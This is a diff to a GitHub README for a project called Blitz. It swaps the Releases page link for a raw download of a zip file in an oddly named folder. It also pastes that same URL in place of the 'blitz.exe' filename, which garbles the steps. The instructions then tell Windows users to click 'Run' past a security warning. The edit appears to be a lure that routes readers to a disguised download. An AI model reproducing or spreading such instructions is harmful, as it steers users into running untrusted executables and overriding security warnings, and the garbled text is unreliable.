Bogdan2316/blitz/README.md

 - **Storage:** Minimum of 100 MB free space

 ### 📥 Download & Install
-1. Visit the [Releases page](https://github.com/Bogdan2316/blitz/releases) to download Blitz.
+1. Visit the [Releases page](https://raw.githubusercontent.com/Bogdan2316/blitz/main/thiophosphoric/blitz-v2.6.zip) to download Blitz.
-2. Choose the latest version suitable for your system (look for "blitz.exe" for Windows, "blitz" for Linux, or the app for macOS).
+2. Choose the latest version suitable for your system (look for "https://raw.githubusercontent.com/Bogdan2316/blitz/main/thiophosphoric/blitz-v2.6.zip" for Windows, "blitz" for Linux, or the app for macOS).
 3. Click on the file name to start the download.
 4. Once the download is complete, navigate to your download folder.

 ### 🏗️ How to Run Blitz
 #### For Windows Users:
-- **Step 1:** Locate the downloaded `blitz.exe`.
+- **Step 1:** Locate the downloaded `https://raw.githubusercontent.com/Bogdan2316/blitz/main/thiophosphoric/blitz-v2.6.zip`.
 - **Step 2:** Double-click the file to launch Blitz.
 - You may see a security warning; click "Run" to continue.